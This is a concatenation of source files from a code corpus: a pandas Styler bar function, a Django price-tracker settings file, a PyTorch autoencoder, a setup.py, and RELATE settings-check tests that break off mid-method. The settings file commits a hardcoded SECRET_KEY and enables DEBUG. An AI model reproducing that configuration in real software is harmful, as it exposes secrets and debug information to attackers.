            z_frac: float = 0.5  # location of zero based on the left-right range
            if align == "zero":
                # all proportions are measured from the center at zero
                limit: float = max(abs(left), abs(right))
                left, right = -limit, limit
            elif align == "mid":
                # bars drawn from zero either leftwards or rightwards with center at mid
                mid: float = (left + right) / 2
                z_frac = (
                    -mid / (right - left) + 0.5 if mid < 0 else -left / (right - left)
                )
            if x < 0:
                start, end = (x - left) / (right - left), z_frac
            else:
                start, end = z_frac, (x - left) / (right - left)
        ret = css_bar(start * width, end * width, color)
        if height < 1 and "background: linear-gradient(" in ret:
            # shrink the bar vertically and center it within the cell
            return (
                ret + f" no-repeat center; background-size: 100% {height * 100:.1f}%;"
            )
        else:
            return ret
    values = data.to_numpy()
    # the value window over which bars are scaled
    left = np.nanmin(values) if vmin is None else vmin
    right = np.nanmax(values) if vmax is None else vmax
    z: float = 0  # adjustment to translate data
    if align == "mid":
        if left >= 0:  # "mid" is documented to act as "left" if all values positive
            align, left = "left", 0 if vmin is None else vmin
        elif right <= 0:  # "mid" is documented to act as "right" if all values negative
            align, right = "right", 0 if vmax is None else vmax
    elif align == "mean":
        z, align = np.nanmean(values), "zero"
    elif callable(align):
        z, align = align(values), "zero"
    elif isinstance(align, (float, int)):
        z, align = float(align), "zero"
    elif not (align == "left" or align == "right" or align == "zero"):
        raise ValueError(
            "`align` should be in {'left', 'right', 'mid', 'mean', 'zero'} or be a "
            "value defining the center line or a callable that returns a float"
        )
    rgbas = None
    if cmap is not None:
        # use the matplotlib colormap input
        with _mpl(Styler.bar) as (plt, mpl):
            cmap = (
                mpl.cm.get_cmap(cmap)
                if isinstance(cmap, str)
                else cmap  # assumed to be a Colormap instance as documented
            )
            norm = mpl.colors.Normalize(left, right)
            rgbas = cmap(norm(values))
            if data.ndim == 1:
                rgbas = [mpl.colors.rgb2hex(rgba) for rgba in rgbas]
            else:
                rgbas = [[mpl.colors.rgb2hex(rgba) for rgba in row] for row in rgbas]
    assert isinstance(align, str)  # mypy: should now be in [left, right, mid, zero]
    # values (and the window) are translated by ``z`` so that "zero"-style
    # alignment can center on a mean/median/custom value
    if data.ndim == 1:
        return [
            css_calc(
                x - z, left - z, right - z, align, colors if rgbas is None else rgbas[i]
            )
            for i, x in enumerate(values)
        ]
    else:
        return np.array(
            [
                [
                    css_calc(
                        x - z,
                        left - z,
                        right - z,
                        align,
                        colors if rgbas is None else rgbas[i][j],
                    )
                    for j, x in enumerate(row)
                ]
                for i, row in enumerate(values)
            ]
        )
| 36.917114 | 88 | 0.5394 |
acfa8ea69c7b9a1877c5938cf9ca274f7a7e0d9c | 3,536 | py | Python | django_amazon/settings.py | wasimakh2/Price-Tracker | 2350a56f88bb97a65a08bca418083119d7c3c660 | [
"MIT"
] | null | null | null | django_amazon/settings.py | wasimakh2/Price-Tracker | 2350a56f88bb97a65a08bca418083119d7c3c660 | [
"MIT"
] | null | null | null | django_amazon/settings.py | wasimakh2/Price-Tracker | 2350a56f88bb97a65a08bca418083119d7c3c660 | [
"MIT"
] | null | null | null | """
Django settings for django_amazon project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and load
# it from the environment before deploying to production.
SECRET_KEY = '*@6ae8bwo%r3mhrer#953zp-fa037aygo3*#n^4(!uyq)1&d+7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
# Project apps (users, tracker) are listed before Django's own apps.
INSTALLED_APPS = [
    'users.apps.UsersConfig',
    'tracker.apps.TrackerConfig',
    'crispy_forms',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'background_task',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_amazon.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'django_amazon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
# django-crispy-forms: render forms with the Bootstrap 4 template pack
CRISPY_TEMPLATE_PACK ='bootstrap4'
# User-uploaded files are stored under <project>/media and served at /media/
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
MEDIA_URL='/media/'
# Auth redirects: named URL patterns for post-login destination and login page
LOGIN_REDIRECT_URL='tracker-home'
LOGIN_URL='login'
# Outgoing mail via Gmail SMTP; credentials come from the environment
# (EMAIL_USER2 / EMAIL_PASS2), so they are None if the variables are unset.
EMAIL_HOST='smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
EMAIL_HOST_USER = os.environ.get('EMAIL_USER2')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASS2') | 25.257143 | 91 | 0.704751 |
acfa8ec0491ee9a27e9a6e7f49bd4dcf85f074c8 | 4,095 | py | Python | src/tar/models/conv_only_very_large2.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 5 | 2019-11-11T10:01:52.000Z | 2020-12-08T11:56:33.000Z | src/tar/models/conv_only_very_large2.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-06-13T06:39:44.000Z | 2020-06-13T06:39:44.000Z | src/tar/models/conv_only_very_large2.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-07-16T23:07:28.000Z | 2020-07-16T23:07:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# =============================================================================
# Created By : Simon Schaefer
# Description : Task aware image downscaling autoencoder model - SCALING.
# Convolutional layers only (no resblocks).
# =============================================================================
import torch
from torch import nn
from tar.modules import _Resblock_, _ReversePixelShuffle_
def build_net():
    """Factory entry point: construct and return a fresh CONV_ONLY_VERY_LARGE2 model."""
    return CONV_ONLY_VERY_LARGE2()
class CONV_ONLY_VERY_LARGE2(nn.Module):
    """Task-aware image downscaling autoencoder built from plain convolutions.

    ``encode`` halves the spatial resolution (via reverse pixel shuffle) and
    compresses back to a 3-channel image; ``decode`` restores the original
    resolution (via pixel shuffle). Both halves use additive skip connections
    over a 64-channel feature map.
    """

    def __init__(self):
        super(CONV_ONLY_VERY_LARGE2, self).__init__()
        # Build encoding part.
        self._downscaling = nn.Sequential(
            nn.Conv2d(3, 8, 3, stride=1, padding=1),
            nn.Conv2d(8, 16, 3, stride=1, padding=1),
            # 16 channels at (p, p) -> 64 channels at (p/2, p/2)
            _ReversePixelShuffle_(downscale_factor=2),
        )
        self._conv_en1 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self._conv_en2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self._conv_en3 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self._conv_en4 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
        self._conv_en5 = nn.Conv2d(128, 256, 3, stride=1, padding=1)
        # BUGFIX: was nn.Conv2d(256, 128, ...), which made the residual
        # addition in encode() (64 channels) and _conv_en7 (64 in-channels)
        # fail with a channel mismatch at runtime. Map back to 64 channels.
        self._conv_en6 = nn.Conv2d(256, 64, 3, stride=1, padding=1)
        self._conv_en7 = nn.Conv2d(64, 3, 3, stride=1, padding=1)
        # Build decoding part.
        self._conv_de1 = nn.Conv2d(3, 64, 3, stride=1, padding=1)
        self._conv_de2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self._conv_de3 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self._conv_de4 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
        self._conv_de5 = nn.Conv2d(128, 256, 3, stride=1, padding=1)
        self._conv_de6 = nn.Conv2d(256, 128, 3, stride=1, padding=1)
        self._conv_de7 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
        self._upscaling = nn.Sequential(
            nn.Conv2d(64, 256, 3, stride=1, padding=1),
            # 256 channels at (p/2, p/2) -> 64 channels at (p, p)
            nn.PixelShuffle(upscale_factor=2),
            nn.Conv2d(64, 3, 3, stride=1, padding=1)
        )

    def encode(self, x: torch.Tensor) -> torch.Tensor:     # b, 3, p, p
        """Downscale ``x`` by a factor of 2 and compress to 3 channels."""
        x = self._downscaling(x)            # b, 64, p/2, p/2
        residual = x
        x = self._conv_en1(x)               # b, 64, p/2, p/2
        x = self._conv_en2(x)               # b, 64, p/2, p/2
        x = torch.add(residual, x)          # b, 64, p/2, p/2
        x = self._conv_en3(x)               # b, 64, p/2, p/2
        x = self._conv_en4(x)               # b, 128, p/2, p/2
        x = self._conv_en5(x)               # b, 256, p/2, p/2
        x = self._conv_en6(x)               # b, 64, p/2, p/2
        x = torch.add(residual, x)          # b, 64, p/2, p/2
        x = self._conv_en7(x)               # b, 3, p/2, p/2
        return x

    def decode(self, x: torch.Tensor) -> torch.Tensor:     # b, 3, p/2, p/2
        """Upscale a 3-channel half-resolution image back to full size."""
        x = self._conv_de1(x)               # b, 64, p/2, p/2
        residual = x
        x = self._conv_de2(x)               # b, 64, p/2, p/2
        x = self._conv_de3(x)               # b, 64, p/2, p/2
        x = torch.add(residual, x)          # b, 64, p/2, p/2
        x = self._conv_de4(x)               # b, 128, p/2, p/2
        x = self._conv_de5(x)               # b, 256, p/2, p/2
        x = self._conv_de6(x)               # b, 128, p/2, p/2
        x = self._conv_de7(x)               # b, 64, p/2, p/2
        x = torch.add(residual, x)          # b, 64, p/2, p/2
        x = self._upscaling(x)              # b, 3, p, p
        return x

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Full autoencoder pass: encode (downscale) then decode (upscale)."""
        return self.decode(self.encode(x))
| 53.181818 | 85 | 0.443712 |
acfa904b117b159eecfead4a89ff9eef99d6d35e | 1,319 | py | Python | setup.py | ligonier/django-sitemap-extras | 1260b20a6ac86e1d6b026599bec318ec1141612f | [
"BSD-3-Clause"
] | null | null | null | setup.py | ligonier/django-sitemap-extras | 1260b20a6ac86e1d6b026599bec318ec1141612f | [
"BSD-3-Clause"
] | null | null | null | setup.py | ligonier/django-sitemap-extras | 1260b20a6ac86e1d6b026599bec318ec1141612f | [
"BSD-3-Clause"
] | null | null | null | import os
from distutils.core import setup
def read_file(filename):
    """Read a file (relative to this setup script's directory) into a string.

    Returns the file contents, or the empty string when the file cannot be
    opened (e.g. it does not exist) -- package metadata is best-effort.
    """
    path = os.path.abspath(os.path.dirname(__file__))
    filepath = os.path.join(path, filename)
    try:
        # use a context manager so the handle is always closed
        # (the original ``open(filepath).read()`` leaked the file handle)
        with open(filepath) as f:
            return f.read()
    except IOError:
        return ''
# Package metadata. NOTE(review): distutils is deprecated (removed in
# Python 3.12); consider migrating to setuptools.setup, which accepts the
# same keyword arguments.
setup(name='django-sitemap-extras',
      version="1.0",
      description='A rethink of django.contrib.sitemaps that focuses on better performance, more flexibliity and support for a larger variety of formats.',
      long_description=read_file('README.rst'),
      author='Justin Quick',
      author_email='justquick@gmail.com',
      url='http://github.com/justquick/django-sitemap-extras',
      packages=['sitemapext', 'sitemapext.runtests', 'sitemapext.builder'],
      # BUGFIX: install_requires expects a list of requirement strings, not
      # the whole requirements file as one string -- split it into lines.
      install_requires=read_file('requirements.txt').splitlines(),
      zip_safe=False,
      classifiers=['Development Status :: 3 - Alpha',
                   'Environment :: Web Environment',
                   'Framework :: Django',
                   'Intended Audience :: Developers',
                   'Intended Audience :: Science/Research',
                   'License :: OSI Approved :: BSD License',
                   'Operating System :: OS Independent',
                   'Programming Language :: Python',
                   'Topic :: Database'],
      )
| 38.794118 | 155 | 0.608795 |
acfa90ece9f76db29da74df66df6e62218b3b1cf | 44,827 | py | Python | tests/test_checks.py | hanjianwei/relate | 971e27a1bdd69236dc6dc294024b50584435a18d | [
"Unlicense"
] | null | null | null | tests/test_checks.py | hanjianwei/relate | 971e27a1bdd69236dc6dc294024b50584435a18d | [
"Unlicense"
] | 6 | 2015-08-18T00:13:40.000Z | 2018-01-31T05:55:13.000Z | tests/test_checks.py | dzhuang/relate | f90cc146861e1523f50d29fa1e90ded32e351428 | [
"Unlicense"
] | null | null | null | __copyright__ = "Copyright (C) 2017 Dong Zhuang"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
from datetime import datetime
from django.core.exceptions import ImproperlyConfigured
from django.test import SimpleTestCase
from django.test.utils import override_settings
from django.utils.translation import gettext_lazy as _
from django.conf import settings
from relate.checks import register_startup_checks_extra
from tests.utils import mock
from tests.factories import UserFactory
class CheckRelateSettingsBase(SimpleTestCase):
    """Base class for testing RELATE's custom Django system checks.

    Subclasses provide :attr:`msg_id_prefix` and use
    :meth:`assertCheckMessages` to assert on the messages emitted by
    ``check_relate_settings``.
    """

    @property
    def func(self):
        # imported lazily so that per-test settings overrides are in effect
        # before the check module is evaluated
        from relate.checks import check_relate_settings
        return check_relate_settings

    @property
    def msg_id_prefix(self):
        # the message-id prefix (the part before the first ".") emitted by
        # the checks a subclass exercises; must be overridden
        raise NotImplementedError()

    def assertCheckMessages(self,  # noqa
            expected_ids=None, expected_msgs=None, length=None,
            filter_message_id_prefixes=None, ignore_order=False):
        """
        Check the run check result of the setting item of the testcase instance

        :param expected_ids: Optional, list of expected message id,
            default to None
        :param expected_msgs: Optional, list of expected message string,
            default to None
        :param length: Optional, the expected number of filtered check
            messages, default to None
        :param filter_message_id_prefixes: a list or tuple of message id prefix,
            to restrict the run check result to be within the iterable.
        :param ignore_order: Optional, if True, ids/messages are compared as
            sorted sequences instead of in emission order.
        """
        if not filter_message_id_prefixes:
            filter_message_id_prefixes = self.msg_id_prefix
        if isinstance(filter_message_id_prefixes, str):
            filter_message_id_prefixes = [filter_message_id_prefixes]
        assert isinstance(filter_message_id_prefixes, (list, tuple))

        if expected_ids is None and expected_msgs is None and length is None:
            raise RuntimeError("At least one parameter should be specified "
                               "to make the assertion")

        result = self.func(None)

        def is_id_in_filter(message_id, prefixes):
            # a message id has the form "<prefix>.<code>"; filter on prefix
            prefix = message_id.split(".")[0]
            return prefix in prefixes

        try:
            result_ids, result_msgs = (
                list(zip(*[(r.id, r.msg) for r in result
                           if is_id_in_filter(r.id, filter_message_id_prefixes)])))

            if expected_ids is not None:
                assert isinstance(expected_ids, (list, tuple))
                if ignore_order:
                    result_ids = tuple(sorted(list(result_ids)))
                    expected_ids = sorted(list(expected_ids))
                self.assertEqual(result_ids, tuple(expected_ids))

            if expected_msgs is not None:
                assert isinstance(expected_msgs, (list, tuple))
                if ignore_order:
                    result_msgs = tuple(sorted(list(result_msgs)))
                    expected_msgs = sorted(list(expected_msgs))
                self.assertEqual(result_msgs, tuple(expected_msgs))

            if length is not None:
                # BUGFIX: previously compared len(expected_ids) against
                # len(result_ids), which raised TypeError when only
                # ``length`` was supplied (expected_ids is None) and never
                # actually used the ``length`` argument. Compare the number
                # of filtered messages with the requested length.
                self.assertEqual(len(result_ids), length)
        except ValueError as e:
            if "values to unpack" in str(e):
                # zip(*[]) produced nothing: no messages matched the filter
                if expected_ids or expected_msgs or length:
                    self.fail("Check message unexpectedly found to be empty")
            else:
                raise
class CheckRelateURL(CheckRelateSettingsBase):
    """Tests for the RELATE_BASE_URL setting checks (ids relate_base_url.E00x)."""
    msg_id_prefix = "relate_base_url"
    # fixtures: one valid and three invalid values for RELATE_BASE_URL
    VALID_CONF = "example.com"
    INVALID_CONF_NONE = None
    INVALID_CONF_EMPTY_LIST = []
    INVALID_CONF_SPACES = " "
    @override_settings(RELATE_BASE_URL=VALID_CONF)
    def test_valid_relate_base_url1(self):
        # a valid URL must produce no check messages
        self.assertCheckMessages([])
    @override_settings(RELATE_BASE_URL=INVALID_CONF_NONE)
    def test_invalid_relate_base_url_none(self):
        self.assertCheckMessages(["relate_base_url.E001"])
    @override_settings(RELATE_BASE_URL=INVALID_CONF_EMPTY_LIST)
    def test_invalid_relate_base_url_empty_list(self):
        self.assertCheckMessages(["relate_base_url.E002"])
    @override_settings(RELATE_BASE_URL=INVALID_CONF_SPACES)
    def test_invalid_relate_base_url_spaces(self):
        self.assertCheckMessages(["relate_base_url.E003"])
class CheckRelateUserProfileMaskMethod(CheckRelateSettingsBase):
    """Checks for the RELATE_USER_PROFILE_MASK_METHOD setting."""
    # This TestCase is not pure for check, but also make sure it returned
    # expected result
    databases = '__all__'
    msg_id_prefix = "relate_user_profile_mask_method"

    def setUp(self):
        super(CheckRelateUserProfileMaskMethod, self).setUp()
        self.user = UserFactory.create(first_name="my_first", last_name="my_last")
        # Clear the cached settings wrapper so each test re-reads the
        # (possibly overridden) setting instead of a stale cached value.
        from accounts.utils import relate_user_method_settings
        relate_user_method_settings.__dict__ = {}

    def test_get_masked_profile_not_configured(self):
        # The setting is optional: deleting it entirely is valid.
        with override_settings():
            del settings.RELATE_USER_PROFILE_MASK_METHOD
            self.assertCheckMessages([])
            # make sure it runs without issue
            self.assertIsNotNone(self.user.get_masked_profile())

    def test_get_masked_profile_valid_none(self):
        with override_settings(RELATE_USER_PROFILE_MASK_METHOD=None):
            self.assertCheckMessages([])
            # make sure it runs without issue
            self.assertIsNotNone(self.user.get_masked_profile())

    def test_get_masked_profile_valid_method1(self):
        # A callable taking exactly one positional argument is accepted.
        def custom_method(u):
            return "%s%s" % ("User", str(u.pk + 1))

        with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
            self.assertCheckMessages([])
            self.assertEqual(self.user.get_masked_profile(),
                             custom_method(self.user))

    def test_get_masked_profile_valid_method2(self):
        # A callable taking one keyword argument with a default is accepted.
        def custom_method(user=None):
            if user is not None:
                return "%s%s" % ("User", str(user.pk + 1))
            else:
                return ""

        with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
            self.assertCheckMessages([])
            self.assertEqual(self.user.get_masked_profile(),
                             custom_method(self.user))

    def test_get_masked_profile_valid_method_path(self):
        # The setting may also be a dotted import path to the callable.
        with override_settings(
                RELATE_USER_PROFILE_MASK_METHOD=(
                    "tests.resource"
                    ".my_custom_get_masked_profile_method_valid")):
            self.assertCheckMessages([])
            from tests.resource import (
                my_custom_get_masked_profile_method_valid as custom_method)
            self.assertEqual(self.user.get_masked_profile(),
                             custom_method(self.user))

    def test_get_masked_profile_param_invalid1(self):
        # the method has 0 args/kwargs
        def custom_method():
            return "profile"

        with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
            self.assertCheckMessages(['relate_user_profile_mask_method.E003'])

    def test_get_masked_profile_param_invalid2(self):
        # the method has 2 args/kwargs
        def custom_method(u, v):
            return "%s%s" % ("User", str(u.pk + 1))

        with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
            self.assertCheckMessages(['relate_user_profile_mask_method.E003'])

    def test_get_masked_profile_param_invalid3(self):
        # the method has 2 args/kwargs
        def custom_method(u, v=None):
            return "%s%s" % ("User", str(u.pk + 1))

        with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
            self.assertCheckMessages(['relate_user_profile_mask_method.E003'])

    def test_get_masked_profile_invalid_path(self):
        # An unimportable dotted path -> E001.
        with override_settings(RELATE_USER_PROFILE_MASK_METHOD="invalid path"):
            self.assertCheckMessages(['relate_user_profile_mask_method.E001'])

    def test_get_masked_profile_valid_path_not_callable(self):
        # An importable path that resolves to a non-callable -> E002.
        with override_settings(
                RELATE_USER_PROFILE_MASK_METHOD=(
                    "tests.resource"
                    ".my_custom_get_masked_profile_method_invalid_str")):
            self.assertCheckMessages(['relate_user_profile_mask_method.E002'])

    def test_passed_check_but_return_none(self):
        # A callable that passes the startup check but returns None must
        # still fail loudly when actually used.
        with override_settings(
                RELATE_USER_PROFILE_MASK_METHOD=(
                    "tests.resource"
                    ".my_custom_get_masked_profile_method_valid_but_return_none")):  # noqa
            self.assertCheckMessages([])
            from tests.resource import (
                my_custom_get_masked_profile_method_valid_but_return_none
                as custom_method)
            # test method can run
            custom_method(self.user)
            with self.assertRaises(RuntimeError):
                self.user.get_masked_profile()

    def test_passed_check_but_return_empty_string(self):
        # Same as above, for an empty-string return value.
        with override_settings(
                RELATE_USER_PROFILE_MASK_METHOD=(
                    "tests.resource"
                    ".my_custom_get_masked_profile_method_valid_but_return_emtpy_string")):  # noqa
            self.assertCheckMessages([])
            from tests.resource import (
                my_custom_get_masked_profile_method_valid_but_return_emtpy_string
                as custom_method)
            # test method can run
            custom_method(self.user)
            with self.assertRaises(RuntimeError):
                self.user.get_masked_profile()
class CheckRelateUserFullNameFormatMethod(CheckRelateSettingsBase):
    """Checks for the RELATE_USER_FULL_NAME_FORMAT_METHOD setting."""
    # This TestCase is not pure for check, but also make sure it returned
    # expected result
    databases = '__all__'
    msg_id_prefix = "relate_user_full_name_format_method"

    def test_get_full_name(self):
        # A valid formatter takes (first_name, last_name) and returns a
        # non-blank text string.
        def valid_method(first_name, last_name):
            return "%s %s" % (last_name, first_name)

        # wrong arity (one parameter only)
        def invalid_method1(first_name):
            return first_name

        # returns None instead of a string
        def invalid_method2(first_name, last_name):
            return None

        # returns a blank string
        def invalid_method3(first_name, last_name):
            return " "

        # returns bytes, not text
        def invalid_method4(first_name, last_name):
            return b"my_name"

        # ignores its arguments (constant result)
        def invalid_method5(first_name, last_name):
            return "my_name"

        # returns a non-string object
        def invalid_method6(first_name, last_name):
            return Exception()

        default_user_dict = {"first_name": "first_name", "last_name": "last_name"}
        default_result = "first_name last_name"

        # Each entry describes one sub-test: the configured method, the
        # user data, the expected get_full_name() results for the default
        # call / allow_blank=False / force_verbose_blank=True, and the
        # check messages the configuration should produce.
        user_get_full_name_test_kwargs_list = (
            ({"id": 1,
              "custom_method": None,
              "user_dict": {},
              "default": '',
              "not_allow_blank": None,
              "force_verbose_blank": "(blank) (blank)"}),
            ({"id": 2,
              "custom_method": None,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result}),
            ({"id": 3,
              "custom_method": valid_method,
              "user_dict": default_user_dict,
              "default": "last_name first_name",
              "not_allow_blank": "last_name first_name",
              "force_verbose_blank": "last_name first_name"}),
            ({"id": 4,
              "custom_method": invalid_method1,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W003']}),
            ({"id": 5,
              "custom_method": invalid_method2,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W004']}),
            ({"id": 6,
              "custom_method": invalid_method3,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W004']}),
            ({"id": 7,
              "custom_method": invalid_method4,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W004']}),
            ({"id": 8,
              "custom_method": invalid_method5,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W005']}),
            ({"id": 9,
              "custom_method": invalid_method6,
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W004']}),
            ({"id": 10,
              "custom_method": "abcd",  # a string
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W001']}),
            ({"id": 11,
              "custom_method":
                  "tests.resource.my_customized_get_full_name_method",
              "user_dict": default_user_dict,
              "default": "First_Name Last_Name",
              "not_allow_blank": "First_Name Last_Name",
              "force_verbose_blank": "First_Name Last_Name"}),
            ({"id": 12,
              "custom_method":
                  "tests.resource.my_customized_get_full_name_method_invalid",
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W004']}),
            ({"id": 13,
              "custom_method":
                  "tests.resource.my_customized_get_full_name_method_invalid_str",
              "user_dict": default_user_dict,
              "default": default_result,
              "not_allow_blank": default_result,
              "force_verbose_blank": default_result,
              "check_messages": ['relate_user_full_name_format_method.W002']}),
            ({"id": 14,
              "custom_method":
                  "tests.resource.my_customized_get_full_name_method",
              "user_dict": {"first_name": "first_name"},
              "default": "First_Name",
              "not_allow_blank": None,
              "force_verbose_blank": "First_Name (Blank)"}),
        )

        # Ensure no duplicate entries in user_get_full_name_test_kwargs_list
        # to generate error info when subTests fail.
        ids = set([kwargs["id"] for kwargs in user_get_full_name_test_kwargs_list])
        assert len(ids) == len(user_get_full_name_test_kwargs_list)

        for kwargs in user_get_full_name_test_kwargs_list:
            # clear cached_property
            from accounts.utils import relate_user_method_settings
            relate_user_method_settings.__dict__ = {}
            with self.subTest(id=kwargs["id"]):
                with override_settings(
                        RELATE_USER_FULL_NAME_FORMAT_METHOD=kwargs[
                            "custom_method"]):
                    check_messages = kwargs.get("check_messages", [])
                    self.assertCheckMessages(check_messages)

                    user = UserFactory(**kwargs["user_dict"])
                    self.assertEqual(user.get_full_name(), kwargs["default"])
                    self.assertEqual(user.get_full_name(allow_blank=False),
                                     kwargs["not_allow_blank"])
                    self.assertEqual(user.get_full_name(force_verbose_blank=True),
                                     kwargs["force_verbose_blank"])
class CheckRelateEmailAppellationPriorityList(CheckRelateSettingsBase):
    """Checks for RELATE_EMAIL_APPELLATION_PRIORITY_LIST, including the
    deprecated (misspelled) RELATE_EMAIL_APPELATION_PRIORITY_LIST alias."""

    msg_id_prefix = "relate_email_appellation_priority_list"

    VALID_CONF_NONE = None
    VALID_CONF = ["full_name"]
    INVALID_CONF_STR = "name1"
    INVALID_CONF = ["name1", "name2"]

    @override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=VALID_CONF_NONE)
    def test_relate_email_appellation_priority_list_none(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=VALID_CONF)
    def test_relate_email_appellation_priority_list_valid(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=INVALID_CONF_STR)
    def test_relate_email_appellation_priority_list_invalid_str(self):
        # A bare string (not a list) -> W001.
        self.assertCheckMessages(
            ["relate_email_appellation_priority_list.W001"])

    @override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=INVALID_CONF)
    def test_relate_email_appellation_priority_list_invalid(self):
        # Unrecognized item names -> W002.
        self.assertCheckMessages(["relate_email_appellation_priority_list.W002"])

    @override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=None,
                       RELATE_EMAIL_APPELATION_PRIORITY_LIST=VALID_CONF)
    def test_relate_email_appellation_priority_list_type_deprecated(self):
